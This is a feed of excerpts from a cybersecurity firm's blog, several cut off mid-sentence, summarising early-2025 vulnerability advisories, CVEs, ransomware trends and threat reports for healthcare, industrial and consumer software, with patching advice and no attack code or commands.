The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued advisories alerting users to vulnerabilities in medical imaging and asset management products. Orthanc is an open-source DICOM server used in healthcare environments for medical imaging storage and retrieval, while Trimble Cityworks is a GIS-centric asset management system used to manage all infrastructure assets for airports, utilities, municipalities, and counties. In a February 6 ICS medical advisory, CISA said the Orthanc server prior to version 1.5.8 does not enable basic authentication by default when remote access is enabled, which could result in unauthorized access by a malicious actor. The Missing Authentication for Critical Function vulnerability, CVE-2025-0896, has been assigned a CVSS v3.1 base score of 9.8, just below the maximum score of 10.0.
Orthanc recommends that users update to the latest version or enable HTTP authentication by setting the configuration "AuthenticationEnabled": true in the configuration file. Cyble provided a publicly accessible search query for its ODIN vulnerability search tool, which users can use to find potentially vulnerable instances. “This flaw requires urgent attention, as Cyble researchers have identified multiple internet-facing Orthanc instances, increasing the risk of exploitation,” the Cyble report said. “The exposure of vulnerable instances could allow unauthorized access to sensitive medical data, manipulation of imaging records, or even unauthorized control over the server. Given the high stakes in healthcare cybersecurity, immediate patching to version 1.5.8 or later, along with restricting external access, is strongly recommended to mitigate potential threats.”

2025-02-13T11:15:54+00:00 https://cyble.com/blog/cyble-warns-of-exposed-medical-imaging-systems/

Cyble - CyberSecurity Firm: New Zealand's National Cyber Security Centre (NCSC) Reports Surge in Cyber Threats and Vulnerabilities

Overview

The 2023/24 Cyber Threat Report from New Zealand's National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country's rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats. For the year ending June 2024, the NCSC recorded a whopping total of 7,122 cybersecurity incidents, marking a new milestone since CERT NZ's integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC's general triage process.
These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage. A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration.

2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware

2025-02-12T10:33:38+00:00 https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/

Cyble - CyberSecurity Firm: Cyber Security Agency of Singapore Alerts Users on Active Exploitation of Zero-Day Vulnerability in Apple Products

Overview

The Cyber Security Agency of Singapore (CSA) has recently issued a warning regarding the active exploitation of a zero-day vulnerability (CVE-2025-24200) in a range of Apple products. This critical vulnerability is being actively targeted, and Apple has released timely security updates to address the issue. If exploited, the vulnerability could allow attackers to bypass certain security features and gain unauthorized access to sensitive data through USB connections. The vulnerability, identified as CVE-2025-24200, affects various Apple devices, including iPhones and iPads.
Specifically, the issue lies in the USB Restricted Mode, a security feature designed to prevent unauthorized access to a device's data when it is locked. A successful attack could disable this mode, allowing an unauthenticated attacker to access the device's data via a USB connection, even if the device is locked. This flaw has been dubbed a "zero-day vulnerability," as it was discovered and actively exploited before a patch or security fix was made available. Apple has moved quickly to resolve the issue with new security updates released on February 10, 2025.

Affected Apple Products

2025-02-11T12:46:32+00:00 https://cyble.com/blog/csa-alerts-users-of-cve-2025-24200/

Cyble - CyberSecurity Firm: Cyble Warns of Patient Monitor Risk in ICS Vulnerability Report

Cyble's weekly industrial control system (ICS) vulnerability report to clients included a warning about a severe vulnerability in a patient monitor that could potentially compromise patient safety. In all, the report covered 36 ICS, operational technology (OT) and Supervisory Control and Data Acquisition (SCADA) vulnerabilities, 31 of which affect critical manufacturing and energy systems. Ten of the 36 vulnerabilities were rated “critical” and 17 carried high-risk ratings.

Patient Monitor Vulnerability Carries a 9.8 Risk Rating

The patient monitor vulnerability, CVE-2024-12248, was one of three flaws in Contec Health CMS8000 Patient Monitors that were addressed in a January 30 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). CISA said the vulnerabilities were reported to the agency anonymously. The Food and Drug Administration (FDA) also issued an alert about the vulnerabilities the same day.
The FDA said the flaws “may put patients at risk after being connected to the internet,” but added that the agency “is not aware of any cybersecurity incidents, injuries, or deaths related to these cybersecurity vulnerabilities at this time.” The FDA advisory contained recommendations for patients and caregivers for mitigating the risk that included the following advice: “If your health c

2025-02-10T13:34:05+00:00 https://cyble.com/blog/cyble-warns-risk-in-ics-vulnerability-report/

Cyble - CyberSecurity Firm: Man-in-the-Middle Attack Risk: Veeam Urges Urgent Patching for CVE-2025-23114

Overview

Veeam has issued a security update to address a critical vulnerability (CVE-2025-23114) affecting its Veeam Updater component. This flaw allows attackers to execute arbitrary code remotely by leveraging a Man-in-the-Middle (MitM) attack. The vulnerability has a CVSS v3.1 score of 9.0, indicating a severe security risk. Users and administrators of affected products should update their software immediately to mitigate potential threats.

Technical Details

The vulnerability exists due to improper Transport Layer Security (TLS) certificate validation in the Veeam Updater component. Attackers can intercept and modify communication between the Veeam Backup server and update sources, enabling them to execute arbitrary code with root privileges. Given the high severity of this flaw, exploitation could lead to complete system compromise, data loss, or ransomware attacks.
Affected Products

The following Veeam Backup products contain the vulnerable Veeam Updater component:
Current Releases: Veeam Backup for Salesforce - Version 3.1 and older
Previous Releases: Veeam Ba

2025-02-10T10:12:05+00:00 https://cyble.com/blog/cve-2025-23114-veeam-users-urged-to-patch-now/

Cyble - CyberSecurity Firm: Open Graph Spoofing Toolkit: Old Exploitation Techniques Still in Use to Lure Social Media Users into Phishing Attacks

The current digital landscape necessitates an approach to sharing content on social media for significant user engagement and click-through rates. This is where the Open Graph Protocol (OGP) comes into play. Developed by Facebook, Open Graph allows web developers to control how their web pages appear when shared across various platforms. Developers use specific meta tags in a webpage's HTML to define essential elements such as the title, description, and image that accompany shared links. Attackers have long exploited the Open Graph Protocol for malicious activities. Recently, Cyble Research and Intelligence Labs (CRIL) also observed a threat actor on a Russian underground offering a toolkit dubbed 'OG Spoof' for similar operations. The toolkit was designed for phishing campaigns, aiming to mislead users and artificially inflate click-through rates by exploiting flaws in the Open Graph protocol.

Overview

The importance of Open Graph (OG) tags cannot be overstated. The OG tags enhance the visibility of content, making it appealing to a broader base of potential viewers and more likely to garner views and clicks.

Figure 1: OG tags used in the header

Several content management systems (CMS), such as WordPress and Magento, come equipped with built-in functionalities or plugins that automatically generate these tags based on the post's content.
This automation ensures that when links are shared, they are presented in an engaging manner while accurately previewing their content. The TA released the 'OG Spoof' kit for sale in October 2024 at a staggering USD 2,500 price and claimed that it was initially designed for their own fraudulent operations. However, as they developed advanced methods, the toolk

2025-02-07T12:57:51+00:00 https://cyble.com/blog/open-graph-spoofing-toolkit/

Cyble - CyberSecurity Firm: Critical Vulnerabilities Reported in Cyble's Weekly Vulnerability Insights

Overview

Cyble Research & Intelligence Labs (CRIL) published their Weekly Vulnerability Insights Report to clients, covering key vulnerabilities reported from January 29 to February 4, 2025. The analysis highlights critical security flaws that have posed cyber threats to various IT infrastructures globally. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added five vulnerabilities to the Known Exploited Vulnerability (KEV) catalog. This report highlights vulnerabilities in several widely used software products and services, including Paessler PRTG Network Monitor, Microsoft .NET Framework, and Zyxel DSL devices. These vulnerabilities could impact a range of industries that rely on these systems to monitor, manage, and protect critical infrastructure.

Incorporation of Vulnerabilities into the KEV Catalog

CISA's inclusion of vulnerabilities in the KEV catalog is an important step in highlighting serious risks associated with widely deployed software. During this period, CISA added five vulnerabilities, including two dating back to 2018, that have been actively exploited and affect major IT infrastructure tools like Paessler PRTG Network Monitor. These vulnerabilities were assessed for their active exploitation and listed accordingly to ensure better protection for organizations globally.
Among the newly added vulnerabilities, CVE-2018-19410 and

2025-02-07T11:44:32+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-kev-catalog/

Cyble - CyberSecurity Firm: U.S. Ransomware Attacks Surge to Start 2025

Overview

According to an analysis of Cyble threat intelligence data, U.S. ransomware attacks have surged to the start of 2025, up nearly 150% from the first five weeks of 2024. Ransomware attacks on U.S. targets have been climbing since a few organizations paid ransoms to attackers in highly publicized cases last year, making the country a more attractive target for ransomware groups. That's likely the main reason for the increase. Regardless of the timeframe or changes in the most active ransomware groups, U.S. ransomware attacks have increased substantially in the last year and have been climbing steadily since the fall. We'll examine the changing ransomware landscape in the U.S. and other frequently attacked countries and consider what changes may be in store as we approach 2025.

The Effect of Ransomware Payments

In the first five weeks of 2024, Cyble documented 152 ransomware attacks on U.S. targets, in line with late 2023 trends. In the first five weeks of 2025, that number soared to 378 attacks on U.S. targets, a 149% year-over-year increase. Compared to the end of 2024, attacks are up a still significant 29% so far in 2025, up from 282 in the last five weeks of the year. Perhaps owing to geographical proximity, Canada has also seen a significant increase in ransomware attacks, up from 14 in the year-ago period to 28 at the end of 2024, and nearly doubling again to 46 to start 2025. Even as North American ransomware attacks have soared, the next-most attacked regions have stayed relatively stable. France, for example, had 18 attacks to start in 2024 and has seen 19 thus far in 2025 (chart below).
2025-02-07T10:55:33+00:00 https://cyble.com/blog/u-s-ransomware-attacks-surge-to-start-2025/

Cyble - CyberSecurity Firm: CISA Issues Nine Critical Industrial Control Systems Advisories, Addressing Vulnerabilities in Key Equipment

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices.

Details of the Industrial Control Systems Advisories

1. Western Telematic Inc. Vulnerability
Advisory Code: ICSA-25-035-01
Vulnerable Products: NPS Seri

2025-02-06T11:44:16+00:00 https://cyble.com/blog/cisa-new-industrial-control-systems-advisories/

Cyble - CyberSecurity Firm: Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers

Overview

The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components.
These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally, our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities required post intrusion.”

Understanding Edge Device Security Risks

Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai

2025-02-06T10:44:52+00:00 https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/

Cyble - CyberSecurity Firm: CISA Adds New Vulnerabilities to Known Exploited Vulnerabilities Catalog – Critical Updates Required

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely-used software products, have been actively exploited by cyber attackers. With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors.
The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems.

Detailed List of Vulnerabilities Highlighted in the Known Exploited Vulnerabilities Catalog

CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability

The first of the vulnerabilities, CVE-2024-45195, relates to a flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat. The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges.

CVE-2024-29059: Microsoft .NET Framework Info

2025-02-05T12:25:39+00:00 https://cyble.com/blog/new-flaws-added-to-known-exploited-vulnerabilities-catalog/

Cyble - CyberSecurity Firm: Australian Cyber Security Centre Urges Immediate Action to Combat Email Scammers

Overview

The Australian Cyber Security Centre (ACSC), part of the Australian Signals Directorate (ASD), has shared new information on cyber threats targeting individuals and organizations across the country. The ACSC has warned that Australians must remain vigilant and take immediate action to protect their personal and professional data.
Over the past few years, Australia has seen an alarming rise in cyberattacks, including phishing, ransomware, and denial-of-service attacks, which are impacting both businesses and private citizens. These cyberattacks often target vulnerabilities in online platforms and devices, aiming to steal sensitive information, disrupt services, or even demand ransom payments. The ACSC has highlighted the rise of email scammers impersonating trusted organizations, such as the ACSC itself. These scammers often attempt to deceive users into disclosing personal details, such as passwords, bank information, or credit card numbers.

The Danger of Email Scammers

One of the most concerning tactics employed by cybercriminals is impersonating government agencies like the ACSC and the ASD. Email scammers frequently send fraudulent emails, often mimicking the ACSC's official logo and email signature, to create a sense of urgency and pressure individuals into responding. These scam messages often contain threats, such a

2025-02-05T10:32:24+00:00 https://cyble.com/blog/acsc-targets-email-scammers/

Cyble - CyberSecurity Firm: Stealthy Attack: Dual Injection Undermines Chrome's App-Bound Encryption

Key Takeaways

Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it. The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors. The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code. The malware is capable of bypassing Chrome's App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files.
Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection. The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution. The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels.

Overview

Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present. This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches

2025-02-05T09:40:09+00:00 https://cyble.com/blog/dual-injection-undermines-chromes-encryption/

Cyble - CyberSecurity Firm: NETGEAR Urges Immediate Firmware Updates for Critical Security Flaws

Overview

NETGEAR has recently addressed two critical security vulnerabilities affecting its products, which, if exploited, could allow unauthenticated attackers to execute arbitrary code or remotely exploit devices. These vulnerabilities impact multiple models, including the XR series routers and WAX series access points. Given the high severity of these vulnerabilities, with Common Vulnerability Scoring System (CVSS) scores of 9.8 and 9.6, users are strongly advised to update their devices immediately to the latest firmware versions to prevent potential cyber threats.
Details of the Security Vulnerabilities

The vulnerabilities impact several NETGEAR devices and could allow remote attackers to take control of the affected routers and access points without requiring authentication. Such security flaws are particularly concerning as they can be leveraged for malicious activities, including data theft, network disruption, and unauthorized surveillance.

Affected Devices and Firmware Updates

NETGEAR has released fixes for the unauthenticated remote code execution (RCE) security vulnerability affecting the following models:
XR1000: Fixed in firmware version 1.0.0.74
XR1000v2: Fixed in firmware version 1.1.0.22
XR500: Fixed in firmware version 2.3.2.134

2025-02-04T10:58:37+00:00 https://cyble.com/blog/netgear-issues-security-severe-rce-vulnerabilities/

Cyble - CyberSecurity Firm: Cyble Sensors Detect Attacks on Apache OFBiz, Palo Alto Networks

Overview

Cyble honeypot sensors have detected new attack attempts on vulnerabilities in Palo Alto Networks' web management interface and the Apache OFBiz ERP system, among dozens of other exploits picked up by Cyble sensors. Cyble's recent sensor intelligence report to clients examined more than 30 vulnerabilities under active exploitation by hackers and also looked at persistent attacks against Linux systems and network and IoT devices. Threat actors continue to scan for vulnerable devices for ransomware attacks and add to botnets for DDoS attacks and crypto mining. The full reports also looked at banking malware, brute-force attacks, vulnerable ports, and phishing campaigns.

Palo Alto Networks Vulnerabilities Targeted

Cyble sensors detected attacks attempting to exploit an OS Command Injection vulnerability in the Palo Alto Networks PAN-OS management web interface. The vulnerability, CVE-2024-9474, could be used by hackers to escalate privileges in PAN-OS.
It could allow attackers who can access the PAN-OS management web interface to perform actions on the firewall with root privileges. P

2025-02-03T13:49:16+00:00 https://cyble.com/blog/cyble-sensors-detect-attacks-on-palo-alto-networks/

Cyble - CyberSecurity Firm: Apple Issues Security Updates for iOS, macOS, watchOS, and More - Patch Now!

Overview

Apple has released security updates to address a newly discovered vulnerability, CVE-2025-24085, in its Core Media framework. This vulnerability is classified as a privilege escalation flaw and is reportedly being actively exploited. If successfully leveraged by a malicious application, this vulnerability could enable an attacker to elevate privileges on an affected device. To mitigate the risk, Apple has released patches across multiple product lines, urging users and administrators to update their devices immediately. The affected operating systems include iOS 18.3 and iPadOS 18.3, macOS Sequoia 15.3, tvOS 18.3, visionOS 2.3, and watchOS 11.3.

Details of CVE-2025-24085

The vulnerability stems from a use-after-free (UAF) issue, a memory management flaw where a program continues to access memory after it has been freed. This can lead to arbitrary code execution, privilege escalation, or application crashes. Apple has addressed this issue by improving memory management. Apple has acknowledged that CVE-2025-24085 may have been actively exploited against iOS versions before iOS 17.2. This underlines the urgency of updating affected devices to the latest security patches.
Impacted Devices and Operating Systems

Apple has rolled out security patches for the following devices and operating system versions:
iOS 18.3 and iPadOS 18.3: iPhone XS and later iPad Pro 1

2025-02-03T12:21:32+00:00 https://cyble.com/blog/apple-fixes-cve-2025-24085-security-update/

Cyble - CyberSecurity Firm: Cyble's Weekly Vulnerability Update: Critical SonicWall Zero-Day and Exploited Flaws Discovered

Overview

Cyble's weekly vulnerability insights to clients cover key vulnerabilities discovered between January 22 and January 28, 2025. The findings highlight a range of vulnerabilities across various platforms, including critical issues that are already being actively exploited. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities to their Known Exploited Vulnerability (KEV) catalog this week. Among these, the zero-day vulnerability CVE-2025-23006 stands out as a critical threat affecting SonicWall's SMA1000 appliances. In this week's analysis, Cyble delves into multiple vulnerabilities across widely used software tools and plugins, with particular attention to SimpleHelp remote support software, Ivanti's Cloud Services Appliance, and issues within RealHome's WordPress theme. As always, Cyble has also tracked underground activity, providing insights into Proof of Concepts (POCs) circulating among cyber criminals.

Weekly Vulnerability Insights

CVE-2025-23006 - SonicWall SMA1000 Appliances (Critical Zero-Day Vulnerability)

A severe deserialization vulnerability in SonicWall's SMA1000 series appliances has been identified as a zero-day, impacting systems that are not yet patched. With a CVSSv3 score of 9.8, this vulnerability is critical and allows remote attackers to exploit deserialization flaws, leading to the potential execution of arbitrary code.
This vulnerability was added to the KEV catalog by CISA on January 23, 2025, marking it as actively exploited in the wild. Organizations using SMA1000 appliances should prioritize patching as soon as an official update becomes available.

2. SimpleHelp Remote Support Software Vulnerabilities (Critical and High Severity)

Three vulnerabilities were discovered in SimpleHelp's remote support software, used by IT professionals for remote customer assistance. These flaws include:
CVE-2024-57726: A privilege escalation vulnerability that allows unauthorized users to gain administrative access due to insufficient backend authorization checks.

2025-01-31T10:18:43+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-update-critical/

Cyble - CyberSecurity Firm: ICS Vulnerability Report: Cyble Urges Critical mySCADA Fixes

Overview

A pair of 9.8-severity flaws in mySCADA myPRO Manager SCADA systems were among the vulnerabilities highlighted in Cyble's weekly Industrial Control System (ICS) Vulnerability Intelligence Report. Cyble Research & Intelligence Labs (CRIL) examined eight ICS vulnerabilities in the January 28 report for clients, including high-severity flaws in critical manufacturing, energy infrastructure, and transportation networks. OS Command Injection (CWE-78) and Improper Security Checks (CWE-358, CWE-319) accounted for half of the vulnerabilities in the report, “indicating a persistent challenge in securing authentication and execution processes in ICS environments,” Cyble said.

Critical mySCADA Vulnerabilities

The critical mySCADA myPRO supervisory control and data acquisition (SCADA) vulnerabilities haven't yet appeared in the NIST National Vulnerability Database (NVD) or the MITRE CVE database, but they were the subject of a CISA ICS advisory on January 23.
The mySCADA myPRO Manager system provides user interfaces and functionality for real-time monitoring and control of industrial processes across a range of critical industries and applications. CISA said the vulnerabilities can be exploited remotely with low attack complexity, potentially allowing a remote attacker to execute arbitrary commands or disclose sensitive information.

CVE-2025-20061 was assigned a CVSS v3.1 base score of 9.8 and is an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. CISA said mySCADA myPRO does not properly neutralize POST requests sent to a specific port with email information, so the vulnerability could be used to execute arbitrary commands on an affected system.

CVE-2025-20014 is also a 9.8-severity OS Command Injection vulnerability, as myPRO also does not properly neutralize POST requests sent to a specific port with version information, which could potentially lead to an attacker executing arbitrary commands.

The following mySCADA products are affected:
- myPRO Manager: Versions prior to 1.3
- myPRO Runtime: Versions prior to 9.2.1

mySCADA recommends that users update to the latest versions:
- mySCADA PRO Manager 1.3
- mySCADA PRO Runtime 9.2.1

Source: https://cyble.com/blog/ics-vulnerability-report-cyble-urges-critical-myscada-fixes/ (2025-01-30)

Cyble - CyberSecurity Firm: New ICS Vulnerabilities Discovered in Schneider Electric and B&R Automation Systems

Overview

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued two urgent advisories regarding serious vulnerabilities in industrial control system (ICS) products. These ICS vulnerabilities, identified in Schneider Electric's RemoteConnect and SCADAPack x70 Utilities, as well as B&R Automation's Runtime software, pose online risks to critical infrastructure systems worldwide.
The ICS vulnerabilities, if exploited, could lead to potentially devastating impacts on the integrity, confidentiality, and availability of systems within energy, critical manufacturing, and other essential sectors.

Schneider Electric's Vulnerability in RemoteConnect and SCADAPack x70 Utilities

The ICS vulnerability in Schneider Electric's RemoteConnect and SCADAPack x70 Utilities arises from the deserialization of untrusted data, identified as CWE-502. This flaw could allow attackers to execute remote code on affected workstations, leading to several security risks, including the loss of confidentiality and integrity. The issue is triggered when a non-admin authenticated user opens a malicious project file, which could potentially be introduced through email, file sharing, or other methods.

Schneider Electric has assigned the CVE identifier CVE-2024-12703 to this vulnerability, with a base CVSS v3 score of 7.8 and a CVSS v4 score of 8.5. Both versions highlight the severity of the issue, with potential consequences including unauthorized remote code execution. This vulnerability affects all versions of both RemoteConnect and SCADAPack x70 Utilities, products widely deployed in sectors such as energy and critical manufacturing across the globe.

Although Schneider Electric is working on a remediation plan for future product versions, there are interim steps that organizations can take to mitigate the risk.
These include:
- Only opening project files from trusted sources
- Verifying file integrity by computing and checking hashes regularly
- Encrypting project files and restricting access to trusted users
- Using secure communication protocols when exchanging files over the network
- Following established SCADAPack Security Guidelines for added protection

CISA recommends minimizing the network exposure of control system devices, ensuring they are not directly accessible from the internet, and placing control system networks behind firewalls to isolate them from business networks. When remote access is necessary, using secure methods like Virtual Private Networks (VPNs) is strongly advised. However, organizations should ens

Source: https://cyble.com/blog/cisa-release-advisories-for-new-ics-vulnerabilities/ (2025-01-29)

Cyble - CyberSecurity Firm: Australia's Health Sector Receives $6.4 Million Cybersecurity Boost with New Threat Information-Sharing Network

The Australian Government has awarded a $6.4 million grant to CI-ISAC Australia, enabling the establishment of a new Health Cyber Sharing Network (HCSN). This initiative is designed to facilitate the rapid exchange of critical cyber threat information within Australia's healthcare industry, which has become a target for cyberattacks.

The recent surge in cyberattacks on Australian healthcare organizations, including hospitals and health insurance providers, has highlighted the pressing need for enhanced cybersecurity measures. In response, the Australian Government has made healthcare the priority sector for its formal funding efforts.
This grant is part of a broader strategy to address the vulnerabilities in the nation's health sector and ensure it is better equipped to handle the cyber threats faced by the industry.

A Growing Threat: The Cost of Cybersecurity Breaches

The healthcare industry globally has been facing increasing cybersecurity challenges, and Australia is no exception. According to reports from 2023, the global healthcare sector continues to experience the most expensive data breaches across industries for the 13th consecutive year. The average cost of a healthcare data breach was a staggering AUD$10.93 million, nearly double that of the financial industry, which recorded an average cost of $5.9 million.

Australia's health sector, which encompasses a diverse range of organizations, from public and private hospitals to medical clinics and insurance providers, is increasingly vulnerable to cyber threats. This sector includes approximately 750 government hospitals, 650 private hospitals, and over 6,500 general practitioner clinics, along with numerous third-party suppliers and vendors.

The creation of the HCSN aims to address these risks by providing a secure, collaborative platform for information sharing. The network will enable health sector organizations to work together more effectively, breaking down silos and improving the speed and quality of cybersecurity threat information exchange.

The Role of CI-ISAC and the Health Cyber-Sharing Network

CI-ISAC Australia, the recipient of the $6.4 million Australian Government grant, will spearhead the creation and management of the Health Cyber Sharing Network.
The HCSN will focus on fostering collaboration between Australian healthcare organizations, ensuring they can share relevant

Source: https://cyble.com/blog/australia-health-cyber-sharing-network/ (2025-01-29)

Cyble - CyberSecurity Firm: Critical Vulnerabilities in Node.js Expose Systems to Remote Attacks

Overview

A series of critical security vulnerabilities have been discovered in multiple versions of Node.js, a popular open-source JavaScript runtime used to build scalable network applications. These vulnerabilities, outlined in CERT-In Vulnerability Note CIVN-2025-0011, have been classified as high severity, with the potential to compromise sensitive information, disrupt services, and even execute arbitrary code. Users of Node.js, including developers and organizations relying on this platform, are urged to take immediate action to secure their systems.

The vulnerabilities affect several versions of Node.js, including both long-term support (LTS) and current releases. Affected versions include Node.js v18.x, v20.x, v22.x, and the latest v23.x. The flaws stem from various issues, including memory leaks, path traversal vulnerabilities, and worker permission bypasses, which could result in denial of service (DoS) conditions, data theft, and potential system compromises.

The vulnerabilities present a high risk of unauthorized access to sensitive data, denial of service, or even complete system compromise. These flaws can be exploited remotely, allowing attackers to gain control over affected systems. The potential impacts are significant, especially in production environments where Node.js applications are running in high-traffic scenarios.
Key Vulnerabilities in Node.js

- CVE-2025-23087 (Node.js v17.x and prior): This critical vulnerability affects older versions of Node.js (v17.x or earlier), with an attacker potentially gaining unauthorized access due to insufficient security controls. The severity of the flaw demands immediate attention from users of these older versions.
- CVE-2025-23088 (Node.js v19.x): A critical flaw affecting Node.js v19.x, which could allow an attacker to bypass security measures and execute arbitrary code. It's essential for users of v19.x to update to the latest release to mitigate the risk.
- CVE-2025-23089 (Node.js v21.x): Similar to CVE-2025-23088, this vulnerability impacts Node.js v21.x, allowing for potential exploitation due to a lack of proper access control and security features. Users should upgrade to patched versions of Node.js immediately.
- CVE-2025-23083 (Worker Permission Bypass): A high-severity vulnerability discovered in Node.js v20.x, v22.x, and v23.x, where an attacker could exploit the internal worker leak mechanism via the diagnostics_channel utility. This flaw could enable unauthorized access to worker threads, which are typically restricted, potentially leading to privilege escalation.

Source: https://cyble.com/blog/critical-vulnerabilities-in-node-js-expose-systems/ (2025-01-28)

Cyble - CyberSecurity Firm: phpMyAdmin 5.2.2 Addresses Critical XSS and Library Vulnerabilities

Overview

phpMyAdmin, a popular web-based tool for managing MySQL and MariaDB databases, has recently released version 5.2.2, addressing multiple vulnerabilities that posed a medium severity risk. This widely used tool is a staple for database administrators, offering strong features and ease of use.
However, the vulnerabilities discovered could potentially expose users to risks such as unauthorized actions, session hijacking, and data theft. The update resolves two cross-site scripting (XSS) vulnerabilities (CVE-2025-24530 and CVE-2025-24529) and a potential issue in the glibc/iconv library (CVE-2024-2961). These vulnerabilities underline the importance of staying up to date with security patches to safeguard sensitive data and ensure secure database management.

According to the advisory:
- Reported By: The vulnerability was reported by a security researcher identified as "bluebird."
- Severity: Moderate.
- Solution: Users are encouraged to upgrade to version 5.2.2 or apply the patch.

Vulnerability Details

Three significant vulnerabilities were identified in phpMyAdmin versions prior to 5.2.2:

1. CVE-2025-24530: XSS in “Check Tables”
- Description: This XSS vulnerability allows an attacker to exploit the "Check Tables" feature by crafting a malicious table name. This could result in injecting malicious scripts into the application.
- Impact: Successful exploitation could lead to session hijacking, data theft, and unauthorized actions.
- CWE ID: CWE-661 (Improper Neutralization of Input During Web Page Generation).
- Fix: This issue was resolved through commit a45efd0eb9415240480adeefc587158c766bc4a0.

2. CVE-2025-24529: XSS in “Insert”
- Description: This vulnerability involves the "Insert" functionality, which could be manipulated to execute malicious scripts.
- Impact: Exploitation could compromise user accounts and sensitive data by injecting malicious code into user

Source: https://cyble.com/blog/phpmyadmin-5-2-2-addresses-critical-xss-and-library/ (2025-01-28)

Cyble - CyberSecurity Firm: IT Vulnerability Report: 7-Zip, Windows and Fortinet Fixes Urged by Cyble

Overview

Cyble's vulnerability intelligence report to clients last week examined high-risk flaws in 7-Zip, Microsoft Windows, and Fortinet, among other products. It also examined dark web claims of a zero-day vulnerability in Apple iOS. In all, the report from Cyble Research and Intelligence Labs (CRIL) looked at 14 vulnerabilities and dark web exploits, including one vulnerability with a maximum CVSS severity score of 10.0 and another with more than 276,000 web exposures.

Here are some of the vulnerabilities highlighted by Cyble's vulnerability intelligence unit as meriting high-priority attention by security teams.

The Top IT Vulnerabilities

CVE-2024-50603 is a 10.0-severity OS Command Injection vulnerability in the Aviatrix Controller that could allow an unauthenticated user to execute arbitrary commands against the cloud networking platform controller, due to improper neutralization of special elements used in an OS command. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation.

CVE-2025-0411 is a critical vulnerability in the 7-Zip file archiving software that allows attackers to bypass the Mark-of-the-Web (MOTW) protection mechanism, which is intended to warn users about potentially dangerous files downloaded from the internet.
